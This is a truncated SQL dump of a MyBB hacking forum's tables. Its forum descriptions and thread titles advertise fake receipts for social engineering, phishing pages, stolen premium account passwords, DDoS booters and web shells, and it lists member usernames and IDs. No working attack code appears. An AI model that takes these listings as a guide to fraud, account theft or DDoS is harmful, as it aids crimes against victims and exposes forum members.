'', '', '0', '0', '0', '', '', 'news2.png', '0'); INSERT INTO mybb_forums VALUES('43', 'PIDs, Serials, CD Keys etc', 'A place to find all product identifications, Serials, product keys and much more. Post your favourite PID generators here. ', '', 'f', '10', '10,43', '11', '1', '1', '17', '65', '1352322172', 'VirtualLegend', '228', '1214', 'Tons of PIDs', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'barcode.png', '0'); INSERT INTO mybb_forums VALUES('44', 'Receipts and POPs', 'Need a fake receipt or proof of purchase to SE your next product/company? Post your requests here. ', '', 'f', '32', '32,44', '4', '1', '1', '5', '23', '1352316618', 'XxTREYZxX', '257', '1219', 'FIFA 13 Receipt', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'receipt-text.png', '0'); INSERT INTO mybb_forums VALUES('45', 'SEing Graphical help', 'Need a fake receipt or POP?', 'http://l33thacking.net/forumdisplay.php?fid=44', 'f', '16', '10,16,45', '2', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'receipt-text.png', '0'); INSERT INTO mybb_forums VALUES('46', 'Phishing and Tabnabbing ', 'A forum for discussions of phishing(Fake login pages) and tabnabbing. ', '', 'f', '10', '10,46', '5', '1', '1', '9', '55', '1352635342', 'mothered', '205', '1234', 'Did someone ever hack you through phishing?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. No phishing discussions on Online Banks, such as PayPal, Liberty reserve etc.\r\n2. You are not allowed to post links to your phishing pages here.\r\n
3. We are not responsible for how you use this section, this section is for educational purposes.
', '0', '0', '0', '', '', 'web_layout.png', '0'); INSERT INTO mybb_forums VALUES('47', 'Member Contests and Giveaways', 'All giveaways and member contests will be held here. There will not be any official contests so participate at your own risk!', '', 'f', '6', '6,47', '3', '1', '1', '16', '144', '1352315328', 'VirtualLegend', '228', '1195', 'Premium Minecraft Accounts', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'package_games_board.png', '0'); INSERT INTO mybb_forums VALUES('48', 'Mod ', 'A section for Mod discussions. Only Mods and Admins can view this forum. ', '', 'f', '1', '1,48', '4', '1', '1', '5', '25', '1350939105', 'NXK', '61', '1066', 'We have a problem here.', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'watchman.png', '0'); INSERT INTO mybb_forums VALUES('49', 'Suggestions and Ideas', 'Have a new Idea? Want to help us improve L33T Hacking? Post all your suggestions and new ideas here. ', '', 'f', '3', '1,3,49', '2', '1', '1', '40', '282', '1352649992', 'sirchamp', '53', '1252', '[Suggestion] Post cooldown', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'Light Bulb Off.png', '0'); INSERT INTO mybb_forums VALUES('50', 'Private Inquiries', 'Have a complaint against someone? Need to report a valid rep abuse? You can only view your own threads.', '', 'f', '3', '1,3,50', '1', '1', '1', '4', '12', '1350432711', 'Timmy', '5', '903', 'Report against a thread', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', 'This forum allows you to talk privately with staff about any issues you have relating to the forum:\r\n
\r\nThe following topics for example should be posted here:\r\n\r\nPlease do not post the following topics:\r\n', '0', '0', '0', '', '', 'flag_red.png', '0'); INSERT INTO mybb_forums VALUES('51', 'Coding', '', '', 'c', '0', '51', '4', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('52', 'Visual Basic and .Net Framework', 'Visual Basic .NET is an Object-Oriented programming language designed by Microsoft.', '', 'f', '51', '51,52', '2', '1', '1', '10', '41', '1352290301', 'iTzIpod', '82', '1216', '[Release]Skype Resolver & GeoIP', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'vb.png', '0'); INSERT INTO mybb_forums VALUES('53', 'Java', 'Java allows you to play online games, chat with people around the world, calculate your mortgage interest, and a lot more. This is sun\'s most popular programming language. ', '', 'f', '51', '51,53', '3', '1', '1', '5', '21', '1349464158', 'Exposé', '222', '505', 'Complete Java Guide', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'java.png', '0'); INSERT INTO mybb_forums VALUES('54', 'Premium Accounts', 'Find access to all premium accounts such as hostings, porn, etc. All threads here must be post here and/or PM me for download.', '', 'f', '31', '31,54', '3', '1', '1', '28', '66', '1352024025', 'sbhshroy2', '255', '1191', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Any leechers or password changer on being caught would be permanently banned.\r\n2. No keylog dumps, only premium accounts. ', '0', '0', '0', '', '', 'my-account.png', '0'); INSERT INTO mybb_forums VALUES('55', 'Gay Free Requests', 'Need something for free? Post your requests here. ', '', 'f', '28', '31,28,55', '1', '1', '1', '8', '26', '1347481482', 'iTzIpod', '82', '369', 'Paypal 1 dollar 50cents', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '10.png', '0'); INSERT INTO mybb_forums VALUES('56', 'Forum Games ', 'All forum games will be held here. ', '', 'f', '7', '6,7,56', '1', '1', '1', '8', '468', '1352648045', 'iTzIpod', '82', '238', 'Ban the user above you', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Threads with 100 or more posts will be closed.\r\n2. No offsite games.\r\n3. You can not post more than thrice a day in the same thread.', '0', '0', '0', '', '', 'package_games_emulator.png', '0'); INSERT INTO mybb_forums VALUES('57', 'Groups ', '', '', 'c', '0', '57', '8', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('58', 'Group Recruitments and Discussions', 'For all topics regarding custom user groups such as recruitment, joining questions, and other threads about groups please post here.', '', 'f', '57', '57,58', '1', '1', '1', '16', '188', '1351549156', 'VirtualLegend', '228', '1094', 'The Marketers - Official Recruitment | Join us Today !', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'groups.png', '0'); INSERT INTO mybb_forums VALUES('59', 'Ebooks', 'Download all electronics books on Hacking here. ', '', 'f', '12', '10,12,59', '1', '1', '1', '12', '39', '1351541469', 'Mac Miller', '302', '1137', '[Ebook]Make $50+ a day usuing AdSense', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'book.png', '0'); INSERT INTO mybb_forums VALUES('61', 'Unique Headquarters', 'Unique groups private forum. ', '', 'f', '57', '57,61', '2', '1', '1', '74', '259', '1352648872', 'VirtualLegend', '228', '1040', 'How To Get Passes To Porn Sites', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'qvfmJ.png', '0'); INSERT INTO mybb_forums VALUES('63', 'Requests', 'Need a signature, userbar, avatar or logo? Request em here. ', '', 'f', '32', '32,63', '3', '1', '1', '8', '91', '1352603954', 't3h jok3r', '1', '1170', 'Need a sig', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'gnome_applications_graphics.png', '0'); INSERT INTO mybb_forums VALUES('64', 'Movie & TV RIPs, Streams etc', 'Want to watch a newly released movie online? Want to watch your favorite TV serial online? This is the right place for you.', '', 'f', '65', '6,65,64', '1', '1', '1', '18', '43', '1352519425', 'Triple H', '4', '1201', 'Sinister Movie Rip', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'redhat-sound_video.png', '0'); INSERT INTO mybb_forums VALUES('65', 'Movie', 'Discuss about your favorite movies here. Get reviews about the latest movies here. ', '', 'f', '6', '6,65', '4', '1', '1', '11', '71', '1352642227', 'VirtualLegend', '228', '1254', 'Who\'s watched The Social Network movie?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'film.png', '0'); INSERT INTO mybb_forums VALUES('66', 'Gamers', 'Gamers Private Forum. We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!', '', 'f', '57', '57,66', '3', '1', '1', '6', '39', '1351167089', 'NXK', '61', '613', 'Some Changes that will be made', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'gamer.png', '0'); INSERT INTO mybb_forums VALUES('68', 'Other', 'Other coding discussions that don\'t have a forum should be discussed here. ', '', 'f', '51', '51,68', '5', '1', '1', '5', '13', '1352527014', 'spacefish36', '8', '1243', 'Simple Perl Booter', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'media-scripts.png', '0'); INSERT INTO mybb_forums VALUES('67', 'PHP', 'PHP is mainly used to define classes and functions and is the leading web programming language because of its strength & simplicity.', '', 'f', '51', '51,67', '4', '1', '1', '6', '17', '1352523436', 'Timmy', '5', '1238', 'Slowlowirs Shell .PHP file', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'application-x-php.png', '0'); INSERT INTO mybb_forums VALUES('69', 'General', 'Discussions related to coding can be discussed here. Please do not post any tutorials in this forum. ', '', 'f', '51', '51,69', '1', '1', '1', '3', '19', '1352349889', 'p420', '9', '1223', '[Release] IP Manager', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'web_coding.png', '0'); INSERT INTO mybb_forums VALUES('70', 'Gaming', '', '', 'c', '0', '70', '9', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO mybb_forums VALUES('71', 'Gamers Lounge', 'A place to chill for all the gamers. ', '', 'f', '70', '70,71', '1', '1', '1', '16', '80', '1352230628', 'VirtualLegend', '228', '951', 'L33thacking Minecraft Server', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'games.png', '0'); INSERT INTO mybb_forums VALUES('72', 'Consoles', 'Discussions on famous gaming consoles such as Playstation 3 and Xbox should be held here. ', '', 'f', '70', '70,72', '2', '1', '1', '8', '52', '1351749562', 'Timmy', '5', '1146', 'DO NOT BUY NFS Most Wanted', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'console.png', '0'); INSERT INTO mybb_forums VALUES('73', 'Mobile and Tablet Gaming', 'For those who have Kindles, IOS, Androids, and Tablet needs post them here. ', '', 'f', '70', '70,73', '3', '1', '1', '12', '54', '1352230724', 'VirtualLegend', '228', '1168', 'Temple Run or Subway Surfer?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'ipad.png', '0'); INSERT INTO mybb_forums VALUES('74', 'Online and Computer Gaming', 'Discuss your favorite games here. Topics include Counter Strike, Minecraft, Texas Hold\'em Poker etc.', '', 'f', '70', '70,74', '4', '1', '1', '20', '171', '1352000872', 'RAND0M1ZER', '262', '1087', 'GEARS OF WAR :P', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'orange_folder_games.png', '0'); INSERT INTO mybb_forums VALUES('75', 'Cheats, Walkthrough and Codes', 'Need cheats? Share your favorite codes, cheats and walkthroughs on your favorite games here. ', '', 'f', '70', '70,75', '5', '1', '1', '6', '16', '1352530472', 'Timmy', '5', '1167', 'Batman Arkham City Cheats', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'games_black.png', '0'); INSERT INTO mybb_forums VALUES('76', 'Playstation 3', 'The top rated console for having the best graphic design and other cool features. ', '', 'f', '72', '70,72,76', '1', '1', '1', '3', '14', '1350800076', 'XxTREYZxX', '257', '1021', 'rage cheats and tips', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'playstation_3_standing_icon.png', '0'); INSERT INTO mybb_forums VALUES('77', 'Xbox 360', 'The Xbox 360 is the second video game console developed by and produced for Microsoft and the successor to the Xbox also competes with the Sony\'s PS3 and Wii.', '', 'f', '72', '70,72,77', '2', '1', '1', '2', '10', '1351648312', 'CommandoModz', '306', '893', 'GamerTag Availability Checker Site', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'xbox_360.png', '0'); INSERT INTO mybb_forums VALUES('79', 'Coders', 'The goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum.\r\n', '', 'f', '57', '57,79', '4', '1', '1', '1', '4', '1351506225', 'HoverCatz', '67', '864', 'Need some coder to check this code', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1lVmr.png', '0'); INSERT INTO mybb_forums VALUES('81', 'DDoSers', 'Find the best booters here. Learn to create booters, DDoSers, post your requests etc.', '', 'f', '57', '57,81', '5', '1', '1', '4', '13', '1352524892', 't3h jok3r', '1', '1240', 'Some private shells', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'dos.png', '0'); INSERT INTO mybb_forums VALUES('82', 'The Marketers Palace', 'We are a High Quality group all about Money Making.', '', 'f', '57', '57,82', '6', '1', '1', '3', '5', '1351387800', 'Apathy', '2', '1119', 'Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'uP3eg.png', '0'); INSERT INTO mybb_forums VALUES('83', 'Miscellaneous Tutorials and Guides', 'All tutorials and guides that don\'t belong in any other section should be posted here.', '', 'f', '7', '6,7,83', '2', '1', '1', '7', '24', '1352528646', 'Timmy', '5', '1244', '[How to] Send a DMCA takedown notice', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. No distributing of porn, pedophile or any similar sort of discussion.\r\n2. No illegal tutorials such as murdering, stealing etc.\r\n3. No program giveaways in this section.\r\n4. No tutorials on weapons creation.\r\n5. No blackhat activity discussions here.', '0', '0', '0', '', '', 'tutorial.png', '0'); INSERT INTO mybb_forums VALUES('84', 'Other Premium Giveaways', 'This section for sharing exploits, VPNs, Shells etc. Anything that doesn\'t fall under the sections above belong in here.', '', 'f', '31', '31,84', '5', '1', '1', '4', '23', '1352524746', 'Timmy', '5', '1239', '800 shells', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'treasure.png', '0'); DROP TABLE IF EXISTS mybb_forumsread; CREATE TABLE mybb_forumsread ( fid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, dateline int(10) NOT NULL, KEY fid (fid,uid), KEY dateline (dateline) ); INSERT INTO mybb_forumsread VALUES('3', '1', '1352678646'); INSERT INTO mybb_forumsread VALUES('21', '1', '1352249242'); INSERT INTO mybb_forumsread VALUES('29', '53', '1352314606'); INSERT INTO mybb_forumsread VALUES('29', '1', '1352589705'); INSERT INTO mybb_forumsread VALUES('29', '67', '1352309185'); INSERT INTO mybb_forumsread VALUES('81', '61', '1352577397'); INSERT INTO mybb_forumsread VALUES('17', '323', '1352479043'); INSERT INTO mybb_forumsread VALUES('7', '1', '1352662506'); INSERT INTO mybb_forumsread VALUES('19', '1', '1352492781'); INSERT INTO mybb_forumsread VALUES('9', '53', '1352542075'); INSERT INTO mybb_forumsread VALUES('71', '257', '1352248812'); INSERT INTO mybb_forumsread VALUES('42', '262', '1352422979'); INSERT INTO mybb_forumsread VALUES('54', '255', '1352373119'); INSERT INTO mybb_forumsread VALUES('59', '323', '1352478612'); INSERT INTO mybb_forumsread VALUES('5', '1', '1352661425'); INSERT INTO mybb_forumsread VALUES('29', '54', '1352274297'); INSERT INTO mybb_forumsread VALUES('18', '257', '1352248726'); INSERT INTO mybb_forumsread VALUES('73', '257', '1352248744'); INSERT INTO mybb_forumsread VALUES('56', '257', '1352619010'); INSERT INTO mybb_forumsread VALUES('29', '62', '1352291339'); INSERT INTO mybb_forumsread VALUES('18', '53', '1352536521'); INSERT INTO mybb_forumsread VALUES('20', '339', '1352508437'); INSERT INTO mybb_forumsread VALUES('42', '1', '1352427117'); INSERT INTO mybb_forumsread VALUES('17', '1', '1352492884'); INSERT INTO mybb_forumsread VALUES('71', '67', '1352309158'); INSERT INTO mybb_forumsread VALUES('13', '67', '1352363435'); INSERT INTO mybb_forumsread VALUES('18', '5', '1352257875'); INSERT INTO mybb_forumsread VALUES('56', '7', '1352536001'); INSERT INTO mybb_forumsread VALUES('42', '53', '1352385714'); INSERT INTO mybb_forumsread VALUES('20', '53', '1352659813'); INSERT INTO mybb_forumsread VALUES('56', '82', '1352648045'); INSERT INTO mybb_forumsread VALUES('18', '82', '1352255266'); INSERT INTO mybb_forumsread VALUES('18', '62', '1352397060'); INSERT INTO mybb_forumsread VALUES('34', '2', '1352408253'); INSERT INTO mybb_forumsread VALUES('18', '1', '1352526851'); INSERT INTO mybb_forumsread VALUES('73', '1', '1352252531'); INSERT INTO mybb_forumsread VALUES('8', '1', '1352393480'); INSERT INTO mybb_forumsread VALUES('59', '1', '1352253684'); INSERT INTO mybb_forumsread VALUES('21', '82', '1352255308'); INSERT INTO mybb_forumsread VALUES('71', '328', '1352258786'); INSERT INTO mybb_forumsread VALUES('58', '328', '1352258820'); INSERT INTO mybb_forumsread VALUES('52', '9', '1352259453'); INSERT INTO mybb_forumsread VALUES('11', '1', '1352571884'); INSERT INTO mybb_forumsread VALUES('18', '324', '1352263115'); INSERT INTO mybb_forumsread VALUES('46', '325', '1352265087'); INSERT INTO mybb_forumsread VALUES('18', '325', '1352265291'); INSERT INTO mybb_forumsread VALUES('9', '62', '1352383940'); INSERT INTO mybb_forumsread VALUES('52', '67', '1352326363'); INSERT INTO mybb_forumsread VALUES('52', '62', '1352286081'); INSERT INTO mybb_forumsread VALUES('61', '62', '1352648035'); INSERT INTO mybb_forumsread VALUES('52', '82', '1352290332'); INSERT INTO mybb_forumsread VALUES('47', '61', '1352293280'); INSERT INTO mybb_forumsread VALUES('28', '53', '1352662536'); INSERT INTO mybb_forumsread VALUES('55', '53', '1352314719'); INSERT INTO mybb_forumsread VALUES('52', '228', '1352315656'); INSERT INTO mybb_forumsread VALUES('18', '228', '1352315776'); INSERT INTO mybb_forumsread VALUES('9', '67', '1352327482'); INSERT INTO mybb_forumsread VALUES('24', '61', '1352328346'); INSERT INTO mybb_forumsread VALUES('23', '61', '1352328351'); INSERT INTO mybb_forumsread VALUES('25', '61', '1352328366'); INSERT INTO mybb_forumsread VALUES('52', '1', '1352328739'); INSERT INTO mybb_forumsread VALUES('8', '61', '1352332695'); INSERT INTO mybb_forumsread VALUES('30', '54', '1352443834'); INSERT INTO mybb_forumsread VALUES('66', '61', '1352347128'); INSERT INTO mybb_forumsread VALUES('61', '61', '1352347133'); INSERT INTO mybb_forumsread VALUES('69', '9', '1352350143'); INSERT INTO mybb_forumsread VALUES('13', '257', '1352353957'); INSERT INTO mybb_forumsread VALUES('69', '67', '1352486400'); INSERT INTO mybb_forumsread VALUES('81', '100', '1352375483'); INSERT INTO mybb_forumsread VALUES('61', '100', '1352375618'); INSERT INTO mybb_forumsread VALUES('13', '53', '1352387060'); INSERT INTO mybb_forumsread VALUES('13', '1', '1352391879'); INSERT INTO mybb_forumsread VALUES('13', '9', '1352391977'); INSERT INTO mybb_forumsread VALUES('25', '5', '1352393641'); INSERT INTO mybb_forumsread VALUES('25', '82', '1352550686'); INSERT INTO mybb_forumsread VALUES('14', '331', '1352409541'); INSERT INTO mybb_forumsread VALUES('11', '150', '1352411003'); INSERT INTO mybb_forumsread VALUES('58', '332', '1352414719'); INSERT INTO mybb_forumsread VALUES('72', '332', '1352414845'); INSERT INTO mybb_forumsread VALUES('71', '332', '1352440747'); INSERT INTO mybb_forumsread VALUES('4', '82', '1352662019'); INSERT INTO mybb_forumsread VALUES('4', '1', '1352664448'); INSERT INTO mybb_forumsread VALUES('25', '1', '1352427269'); INSERT INTO mybb_forumsread VALUES('30', '1', '1352571057'); INSERT INTO mybb_forumsread VALUES('49', '333', '1352441502'); INSERT INTO mybb_forumsread VALUES('49', '1', '1352678725'); INSERT INTO mybb_forumsread VALUES('42', '333', '1352625017'); INSERT INTO mybb_forumsread VALUES('49', '334', '1352431858'); INSERT INTO mybb_forumsread VALUES('54', '54', '1352437662'); INSERT INTO mybb_forumsread VALUES('8', '332', '1352440850'); INSERT INTO mybb_forumsread VALUES('69', '332', '1352443378'); INSERT INTO mybb_forumsread VALUES('24', '332', '1352443405'); INSERT INTO mybb_forumsread VALUES('18', '332', '1352443437'); INSERT INTO mybb_forumsread VALUES('25', '67', '1352445821'); INSERT INTO mybb_forumsread VALUES('49', '228', '1352470024'); INSERT INTO mybb_forumsread VALUES('30', '228', '1352449726'); INSERT INTO mybb_forumsread VALUES('49', '82', '1352519286'); INSERT INTO mybb_forumsread VALUES('20', '336', '1352469285'); INSERT INTO mybb_forumsread VALUES('58', '336', '1352469335'); INSERT INTO mybb_forumsread VALUES('30', '53', '1352474302'); INSERT INTO mybb_forumsread VALUES('69', '53', '1352475708'); INSERT INTO mybb_forumsread VALUES('19', '61', '1352493760'); INSERT INTO mybb_forumsread VALUES('29', '61', '1352491874'); INSERT INTO mybb_forumsread VALUES('16', '1', '1352493094'); INSERT INTO mybb_forumsread VALUES('23', '199', '1352501430'); INSERT INTO mybb_forumsread VALUES('59', '338', '1352504168'); INSERT INTO mybb_forumsread VALUES('46', '4', '1352519874'); INSERT INTO mybb_forumsread VALUES('49', '4', '1352518667'); INSERT INTO mybb_forumsread VALUES('16', '5', '1352521492'); INSERT INTO mybb_forumsread VALUES('20', '5', '1352521610'); INSERT INTO mybb_forumsread VALUES('61', '5', '1352521857'); INSERT INTO mybb_forumsread VALUES('67', '5', '1352523437'); INSERT INTO mybb_forumsread VALUES('28', '5', '1352524747'); INSERT INTO mybb_forumsread VALUES('81', '1', '1352524893'); INSERT INTO mybb_forumsread VALUES('28', '1', '1352596626'); INSERT INTO mybb_forumsread VALUES('68', '9', '1352526452'); INSERT INTO mybb_forumsread VALUES('28', '258', '1352526524'); INSERT INTO mybb_forumsread VALUES('18', '9', '1352526830'); INSERT INTO mybb_forumsread VALUES('25', '8', '1352527905'); INSERT INTO mybb_forumsread VALUES('83', '1', '1352528081'); INSERT INTO mybb_forumsread VALUES('83', '5', '1352528647'); INSERT INTO mybb_forumsread VALUES('84', '1', '1352596640'); INSERT INTO mybb_forumsread VALUES('31', '1', '1352596645'); INSERT INTO mybb_forumsread VALUES('33', '1', '1352603898'); INSERT INTO mybb_forumsread VALUES('33', '4', '1352597632'); INSERT INTO mybb_forumsread VALUES('75', '5', '1352531538'); INSERT INTO mybb_forumsread VALUES('23', '5', '1352531501'); INSERT INTO mybb_forumsread VALUES('83', '53', '1352534397'); INSERT INTO mybb_forumsread VALUES('58', '1', '1352536376'); INSERT INTO mybb_forumsread VALUES('84', '53', '1352662553'); INSERT INTO mybb_forumsread VALUES('49', '257', '1352619609'); INSERT INTO mybb_forumsread VALUES('28', '257', '1352550689'); INSERT INTO mybb_forumsread VALUES('28', '62', '1352550221'); INSERT INTO mybb_forumsread VALUES('9', '228', '1352550807'); INSERT INTO mybb_forumsread VALUES('28', '228', '1352580102'); INSERT INTO mybb_forumsread VALUES('33', '82', '1352598257'); INSERT INTO mybb_forumsread VALUES('28', '82', '1352550779'); INSERT INTO mybb_forumsread VALUES('84', '228', '1352550736'); INSERT INTO mybb_forumsread VALUES('9', '341', '1352555731'); INSERT INTO mybb_forumsread VALUES('9', '257', '1352679635'); INSERT INTO mybb_forumsread VALUES('33', '53', '1352561956'); INSERT INTO mybb_forumsread VALUES('13', '4', '1352571989'); INSERT INTO mybb_forumsread VALUES('16', '342', '1352663803'); INSERT INTO mybb_forumsread VALUES('11', '53', '1352625357'); INSERT INTO mybb_forumsread VALUES('48', '1', '1352580564'); INSERT INTO mybb_forumsread VALUES('58', '61', '1352577390'); INSERT INTO mybb_forumsread VALUES('50', '1', '1352578763'); INSERT INTO mybb_forumsread VALUES('48', '228', '1352642360'); INSERT INTO mybb_forumsread VALUES('82', '61', '1352583667'); INSERT INTO mybb_forumsread VALUES('63', '4', '1352597601'); INSERT INTO mybb_forumsread VALUES('63', '82', '1352604417'); INSERT INTO mybb_forumsread VALUES('63', '1', '1352603955'); INSERT INTO mybb_forumsread VALUES('25', '343', '1352609966'); INSERT INTO mybb_forumsread VALUES('63', '257', '1352617562'); INSERT INTO mybb_forumsread VALUES('65', '228', '1352642230'); INSERT INTO mybb_forumsread VALUES('46', '53', '1352645334'); INSERT INTO mybb_forumsread VALUES('63', '228', '1352648588'); INSERT INTO mybb_forumsread VALUES('5', '61', '1352649954'); INSERT INTO mybb_forumsread VALUES('8', '53', '1352660913'); INSERT INTO mybb_forumsread VALUES('2', '1', '1352662546'); INSERT INTO mybb_forumsread VALUES('64', '1', '1352662786'); INSERT INTO mybb_forumsread VALUES('66', '1', '1352664724'); DROP TABLE IF EXISTS mybb_forumsubscriptions; CREATE TABLE mybb_forumsubscriptions ( fsid int(10) unsigned NOT NULL auto_increment, fid smallint(5) unsigned NOT NULL, uid int(10) unsigned NOT NULL, PRIMARY KEY (fsid) ); DROP TABLE IF EXISTS mybb_google_seo; CREATE TABLE mybb_google_seo ( active tinyint(3) unsigned, idtype tinyint(3) unsigned NOT NULL, id int(10) unsigned NOT NULL, url varchar(120) NOT NULL, KEY idtype (idtype,url), KEY active (active,idtype,id) ); INSERT INTO mybb_google_seo VALUES(NULL, '0', '0', ''); INSERT INTO mybb_google_seo VALUES('1', '4', '60', 'guide-Basic-Computer-Security'); INSERT INTO mybb_google_seo VALUES('1', '4', '16', 'Is-Hacking-legal-or-illegal'); INSERT INTO mybb_google_seo VALUES('1', '3', '12', 'Tutorials'); INSERT INTO mybb_google_seo VALUES(NULL, '4', '358', 'Misconfigure-Unable-Cloudflare-downtime'); INSERT INTO mybb_google_seo VALUES('1', '4', '362', 'List-of-TOP-10-HACKERS'); INSERT INTO mybb_google_seo VALUES('1', '4', '63', 'Guide-Keylogger-Information-Removal-Guide'); INSERT INTO mybb_google_seo VALUES('1', '4', '11', 'EXE-Booter-Pack'); INSERT INTO mybb_google_seo VALUES('1', '1', '20', 'JakeUS'); INSERT INTO mybb_google_seo VALUES('1', '3', '61', 'Unique-Headquarters'); INSERT INTO mybb_google_seo VALUES('1', '4', '346', 'showthread.php?Heads-Up'); INSERT INTO mybb_google_seo VALUES(NULL, '3', '3', 'Announcements-Feedback-Bugs-and-Suggestions'); INSERT INTO mybb_google_seo VALUES('1', '4', '358', 'showthread.php?Misconfigure-Unable-Cloudflare-downtime'); INSERT INTO mybb_google_seo VALUES('1', '1', '1', 't3h-jok3r'); INSERT INTO mybb_google_seo VALUES('1', '1', '61', 'NXK'); INSERT INTO mybb_google_seo VALUES('1', '1', '166', '2112'); INSERT INTO mybb_google_seo VALUES('1', '1', '181', 'Sotark'); INSERT INTO mybb_google_seo VALUES('1', '1', '82', 'iTzIpod'); INSERT INTO mybb_google_seo VALUES('1', '1', '150', 'MinecraftGeek'); INSERT INTO mybb_google_seo VALUES('1', '1', '172', 'MistaCode'); INSERT INTO mybb_google_seo VALUES('1', '1', '9', 'p420'); INSERT INTO mybb_google_seo VALUES('1', '1', '53', 'sirchamp'); INSERT INTO mybb_google_seo VALUES('1', '1', '180', 'ThatUselessMan'); INSERT INTO mybb_google_seo VALUES('1', '1', '5', 'Timmy'); INSERT INTO mybb_google_seo VALUES('1', '1', '112', '??????Z'); INSERT INTO mybb_google_seo VALUES('1', '3', '1', 'General'); INSERT INTO mybb_google_seo VALUES('1', '3', 